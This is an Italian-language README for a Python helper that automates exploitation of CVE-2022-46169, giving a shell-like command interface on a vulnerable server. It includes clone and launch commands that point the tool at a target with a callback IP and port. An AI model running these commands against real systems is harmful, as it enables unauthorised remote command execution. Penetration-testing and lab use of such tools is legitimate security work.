
Questo script Python aiuta nello sfruttamento di CVE-2022-46169 automatizzando la consegna del payload e la gestione delle risposte. Avvia un server HTTP, resta in ascolto delle richieste e consente l'immissione di comandi per l'interazione in tempo reale con un target vulnerabile.
Questo script Python funge da strumento ausiliario per semplificare il processo di sfruttamento della vulnerabilità CVE-2022-46169. Avvia un server HTTP che rimane in ascolto delle richieste in arrivo e fornisce una semplice interfaccia per consentire all'utente di inserire comandi. Questi comandi vengono poi eseguiti sul server di destinazione, automatizzando l'invio di payload appositamente predisposti a un server vulnerabile e l'osservazione delle risposte del server in tempo reale.
Grazie a questo script, un utente può automatizzare l'invio di payload appositamente predisposti a un server vulnerabile e osservare le risposte del server in tempo reale.
git clone [email protected]:ahanel13/ImprovedShell-for-CVE-2022-46169.git
cd ImprovedShell-for-CVE-2022-46169
python CVE-2022-46169_helper.py -h
python3 CVE-2022-46169_helper.py --target http://10.10.11.211 --ip 10.10.14.86 --port 5000

Questo script è destinato esclusivamente a scopi educativi e a un uso legittimo. Assicurarsi sempre di ottenere la dovuta autorizzazione prima di effettuare qualsiasi tipo di test di penetrazione o valutazione della sicurezza.